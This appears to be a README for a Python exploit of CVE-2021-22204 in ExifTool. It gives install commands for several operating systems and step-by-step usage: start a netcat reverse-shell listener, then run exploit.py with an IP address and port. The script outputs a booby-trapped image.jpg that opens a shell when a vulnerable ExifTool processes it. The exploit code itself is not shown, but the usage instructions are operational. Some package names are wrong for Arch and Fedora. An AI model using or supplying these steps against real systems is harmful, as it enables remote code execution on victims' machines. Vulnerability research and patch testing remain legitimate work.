CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
Video tutorial
Youtube
404 notfound
Requirements
python3 python3-pip djvulibre-bin exiftool
Install requirements
Debian
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
Ubuntu
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
Arch Linux
pacman -S djvulibre libimage-exiftool-perl python python-pip
Kali Linux
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
Fedora
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
OS X
brew install djvulibre exiftool python
Raspbian
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
How to run:
Install python requirements
sudo pip install -r requirements.txt
start reverse shell with natcat
nc -nvlp 4444
Give execute permission
chmod +x exploit.py
Run program
python3 exploit.py {Your IP add adress} {Your Listening port}
OR
./exploit.py {Your IP add adress} {Your Listening port}
Example
python3 exploit.py 192.168.0.1 4444
OR
./exploit.py 192.168.0.1 4444
Output file name is
image.jpg
About the vulnerability
The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)
This exploit was made by studying the exiftool patch after the CVE was already reported.
And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.